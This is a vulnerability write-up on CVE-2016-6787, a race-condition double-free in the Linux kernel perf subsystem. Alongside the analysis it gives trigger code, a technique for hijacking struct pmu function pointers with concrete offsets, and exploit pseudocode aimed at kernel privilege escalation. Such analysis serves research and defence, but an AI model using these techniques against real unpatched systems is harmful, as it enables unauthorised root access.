===
Abstract
perf is a complex system in linux kernel,
and exists other vulnerabilities like CVE-2013-2094
.
Di Shen, a member of Keen Team, presetated a parper (Defeating Samsung KNOX with zero privilege
)[1] that mentioned CVE-2016-6787
[2].
Analysis of CVE-2016-6787
This is a double-free vulnerability.
The vulnerable object is struct perf_event_context
. Review below code firstly, the mainly bug is in the if(move_group)
statement; thus set move_group to 1 is necessary.
We will talk about how to set the variable move_group
up in later section.
Assume that the move_group
has been set 1, we look at the put_ctx(gctx)
at the 20 line of Code snippet 1
, it lacks a locker to protect it when two threads run simultaneously.
put_ctx(gctx)
makes gctx->refcount minus one, then checks that refcount equals zero whether or not. If gctx->refcount
equals zero, it’ll be free.
// Code snippet 1
if (move_group) {
struct perf_event_context *gctx = group_leader->ctx;
mutex_lock(&gctx->mutex);
perf_remove_from_context(group_leader, false);
/*
* Removing from the context ends up with disabled
* event. What we want here is event in the initial
* startup state, ready to be add into new context.
*/
perf_event__state_init(group_leader);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_remove_from_context(sibling, false);
perf_event__state_init(sibling);
put_ctx(gctx);
}
mutex_unlock(&gctx->mutex);
put_ctx(gctx);
}
WARN_ON_ONCE(ctx->parent_ctx);
mutex_lock(&ctx->mutex);
if (move_group) {
synchronize_rcu();
perf_install_in_context(ctx, group_leader, group_leader->cpu);
get_ctx(ctx);
list_for_each_entry(sibling, &group_leader->sibling_list,
group_entry) {
perf_install_in_context(ctx, sibling, sibling->cpu);
get_ctx(ctx);
}
}
//http://elixir.free-electrons.com/linux/v3.18.20/source/kernel/events/core.c#L7290
So, we could create at least two threads for racing.
How about move_group
As the comment in the below code(Code snippet 2
) from line 12 to line 16, if group_leader
is a pure software group, and we try add a hardware event, then it’ll move all events in the group to the hardware context.
// Code snippet 2
SYSCALL_DEFINE5(perf_event_open,
struct perf_event_attr __user *, attr_uptr,
pid_t, pid, int, cpu, int, group_fd, unsigned long, flags)
{
...
if (group_leader &&
(is_software_event(event) != is_software_event(group_leader))) {
if (is_software_event(event)) {
pmu = group_leader->pmu;
} else if (is_software_event(group_leader) &&
(group_leader->group_flags & PERF_GROUP_SOFTWARE)) {
/*
* In case the group is a pure software group, and we
* try to add a hardware event, move the whole group to
* the hardware context.
*/
move_group = 1;
}
}
//http://elixir.free-electrons.com/linux/v3.18.20/source/kernel/events/core.c
So we know that if move_group
equals one then all events in the group of software-context move into hardware-context according to code snippet 1
.
+-----------------------+ +-----------------------+
| software-context | | hardware-context |
|-----------------------| if(move_group |-----------------------|
| +------------------+ | == 1) | |
| | struct perf_event| | | |
| |------------------| | +------------> | |
| | group_leader | | | |
| | | | | |
| +------------------+ | | |
| ... | | |
+-----------------------+ +-----------------------+
Exploitation
Trigger the vulnerability
-
Thread_1 for allocation: We create group_leader thread through
perf_event_open()
withPERF_TYPE_SOFTWARE
type andPERF_FLAG_FD_OUTPUT
flag, and then go to sleep viafutex()
.You will get a
group_fd
from aboveperf_event_open()
systemc call.The variable (group_fd) will be used by Thread_2 and Thread_3.
struct perf_event_attr attr = { 0 }; attr.type = 1; //PERF_TYPE_SOFTWARE; attr.config = 3LL; //PERF_COUNT_HW_CACHE_MISSES; attr.size = 96;//sizeof attr; pid = syscall(178); group_fd = perf_event_open(&attr, pid, 0xffffffffLL, -1LL, 2LL);
gctx->refconunt = 1,
find_get_context() -> alloc_perf_context() -> __perf_event_init_context(struct perf_event_context *ctx) -> atomic_set(&ctx->refcount, 1);
-
Thread_2 and Thread_3 for free:
Invoking
perf_event_open(&attr, 0, 0, group_fd, 0)
withPERF_TYPE_HARDWARE
in thread_2 and thread_3, we will set up move_group to one and racing.
Open Pandora’s box
The kernel does not crash directly after trigger this bug.
Therefore, we can do physmap-based spraying on struct perf_event_context
.[5]
After above threads go to sleep via futex()
, the kernel scheduler will execute
perf_event_context_sched_in()
that leads to kernel crash.
// Code snippet 3
static void perf_event_context_sched_in(struct perf_event_context *ctx,
struct task_struct *task)
{
struct perf_cpu_context *cpuctx;
cpuctx = __get_cpu_context(ctx);
if (cpuctx->task_ctx == ctx)
return;
perf_ctx_lock(cpuctx, ctx);
perf_pmu_disable(ctx->pmu);
// be hijacked, then go to kernel_sock_ioctl(), set addr_limit = -1.
if (!list_empty(&ctx->pinned_groups))
cpu_ctx_sched_out(cpuctx, EVENT_FLEXIBLE);
perf_event_sched_in(cpuctx, ctx, task);
perf_pmu_enable(ctx->pmu);
// be hijacked, launch ret intruction directly.
perf_ctx_unlock(cpuctx, ctx);
}
Our goal is to get the root not just crash, so we need to make a fake struct pmu
in
re-filled struct perf_event_context
. By the way, the struct pmu
contains some functions pointer we can hijack.
Look out the struct pmu
, do you feel excited?
struct pmu {
...
int * __percpu pmu_disable_count;
struct perf_cpu_context * __percpu pmu_cpu_context;
int task_ctx_nr;
int hrtimer_interval_ms;
/*
* Fully disable/enable this PMU, can be used to protect from the PMI
* as well as for lazy/batch writing of the MSRs.
*/
void (*pmu_enable) (struct pmu *pmu); /* optional */
void (*pmu_disable) (struct pmu *pmu); /* optional */
...
According to Code snippet 3
, we could fill the address of kernel_sock_ioctl
instead of the original address of pmu_disable
. Because kernel_sock_ioctl
can help us to enable write kernel space arbitrarily.
kernel_setsockopt()
is the another function such as this one.
Suppose that we can execute the kernel_sock_ioctl()
and control its 1st argument(struct socket *sock
), then can jump over the set_fs(oldfs)
to kernel_sock_ioctl
epilogue by manipulating struct socket *sock
.
By the way, we also fill some hard-core addresses to avoid crash and guarante writing kernel space successfully.
You can get more details in later POC code section.
int kernel_sock_ioctl(struct socket *sock, int cmd, unsigned long arg)
{
mm_segment_t oldfs = get_fs();
int err;
set_fs(KERNEL_DS);
err = sock->ops->ioctl(sock, cmd, arg);
set_fs(oldfs);
return err;
}
If you could write kernel space arbitrarily and get some infoleak, it almost equals to get root privilege. There are a lot of poc or exploit on the internet, so we don’t talk it more here.
PoC pseudocode
Below poc only set up the addr_limit for writing kernel.
static void init_pmu(unsigned long pmu)
{
// Refer to `struct pmu` in include/linux/perf_event.h.
*(unsigned long*)(pmu + 64) =
loc_per_cpu_start;
// pmu->pmu_cpu_context. Avoid crash.
*(unsigned long*)(pmu + 96) =
loc_kernel_sock_ioctl;
// pmu->pmu_disable, function pointer, pointing to kernel_sock_ioctl
*(unsigned long*)(pmu + 56) =
loc_per_cpu_start;
// pmu->pmu_disable_conut, , pointing to _per_cpu_start
*(unsigned long*)(pmu + 88) =
loc_direct_ret;
// pmu->pmu_enable, (function pointer)
*(unsigned long*)(pmu + 40) = pmu + 0x100;
// == *sock->ops, for hijacking sock->ops->ioctl
*(unsigned long*)(pmu + 328) =
loc_kernel_sock_ioctl_ret;
// == *sock->ops->ioctl, for hijacking sock->ops->ioctl, = kernel_sock_ioctl_ret
}
void phymaps_spray()
{
/* Here we phymaps_spray the fake `struct perf_event_context`
* pointing fake pmu we puted in user space.
*/
while ( start_addr < ret2dir_limit )
{
addr = mmap((void*)start_addr, alloc_size);
while ( addr < addr + alloc_size )
{
// Refer to struct `perf_event_context` in include/linux/perf_event.h.
*(unsigned long*)addr = pmu_addr;
addr += 512LL;
}
mlock(addr, alloc_size);
start_addr += alloc_size;
}
}
void prepare()
{
pmu_addr = mmap(pmu_address) // you mmap a memory range in user space.
init_pmu(pmu_addr); // init the fake pmu
lift_spray();
}
void *thread_1_for_alloc()
{
group_id = perf_event_open(pid, PERF_TYPE_SOFTWARE);
sem_post(&sem);
futex(FUTEX_WAIT_REQUEUE_PI); // wait for waking up.
if (read_at_address_pipe(Kernel_space))
puts("Turn UAF bug to arbitrary read/write memory");
/* While exploit execute here, representing you can read/write arbitrary memory.
* it's convenient to get the root priv. just like `towelroot`.
*/
}
void *thread_for_free()
{
perf_event_open(pid, PERF_TYPE_HARDWARE, group_id);
sem_post(&sem);
futex() // go to sleep.
}
int trigger()
{
thread_create(thread_1_for_alloc);
thread_create(thread_for_free);
thread_create(thread_for_free);
sem_wait(&sem);
sem_wait(&sem);
sem_wait(&sem);
stop_lift_spray();
phymaps_spray();
futex(FUTEX_CMP_REQUEUE_PI); /* wake up thread_1_for_alloc */
}
void main()
{
prepare();
trigger();
}
Reference
[1] Defeating Samsung KNOX with zero privilege https://www.blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege-wp.pdf
[2] perf: protect group_leader from races that cause ctx https://patchwork.kernel.org/patch/9499761/
[3] samsung s7 source code https://github.com/jcadduono/android_kernel_samsung_msm8996.git
[4] perf: protect group_leader from races that cause ctx double-free https://android.googlesource.com/kernel/msm/+/5b87e00be9ca28ea32cab49b92c0386e4a91f730%5E!/
[5] From Collision To Exploitation: Unleashing Use-After-Free Vulnerabilities in Linux Kernel http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20From%20collision%20to%20exploitation%3A%20Unleashing%20Use-After-Free%20vulnerabilities%20in%20Linux%20Kernel.pdf